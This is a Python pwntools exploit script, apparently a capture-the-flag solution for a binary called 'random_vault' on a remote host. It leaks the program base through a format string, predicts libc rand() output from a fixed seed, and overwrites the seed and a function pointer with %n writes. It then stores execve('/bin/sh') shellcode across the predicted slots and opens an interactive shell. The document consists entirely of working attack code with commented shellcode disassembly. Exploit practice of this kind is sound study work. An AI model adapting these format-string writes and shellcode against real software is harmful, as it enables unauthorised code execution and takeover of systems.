```
from pwn import *
from ctypes import CDLL

context.arch = 'amd64'
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./random_vault', checksec=False)

if len(sys.argv) == 1:
s = process('./random_vault')
else:
s = remote('68.183.204.108', 1245)

def change_username(username):
s.sendlineafter(': ', username)
s.recvuntil('Hello, ')
leak = s.recvline().strip()
s.recvline()
return leak

def store(secrets):
s.sendlineafter('\n\n', '2')
for i in range(7):
s.sendlineafter(': ', str(secrets[i]))

elf.address = int(change_username('%11$p'), 16) - 0x1750
print 'pie @ ' + hex(elf.address)

seed = 176
libc.srand(seed)

# [18, 99, 114, 124, 125, 143, 164]
print [libc.rand() & 0xff for i in range(7)]

offset = 114
shellcode = [
0, # 18
0, # 99
0xd23148e08948, # 114
0x91969dd1bb489090, # 124
0x53dbf748ff978cd0, # 125
0x905e545752905f54, # 143
0x050f3bb0c031 # 163
]

# ... 114:
# 48 89 e0 mov rax,rsp
# 48 31 d2 xor rdx,rdx

# ... 124-125:
# 90 nop
# 90 nop
# 48 bb d1 9d 96 91 d0 movabs rbx,0xff978cd091969dd1
# 8c 97 ff
# 48 f7 db neg rbx
# 53 push rbx

# ... 143:
# 54 push rsp
# 5f pop rdi
# 90 nop
# 52 push rdx
# 57 push rdi
# 54 push rsp
# 5e pop rsi
# 90 nop

# .. 163:
# 31 c0 xor eax,eax
# b0 3b mov al,0x3b
# 0f 05 syscall

p = '%{}c%27$n'.format(seed)
p += '%{}c%28$hn'.format((elf.address + 0x5000 + 0x10 + offset * 8 - seed) & 0xffff)
p += 'X' * (24 - len(p))
p += p64(elf.address + 0x5008) # seed
p += p64(elf.address + 0x5000) # fptr

s.sendlineafter('\n\n', '1')
change_username(p)

store(shellcode)
s.recvline()
s.recvline()

s.interactive()

```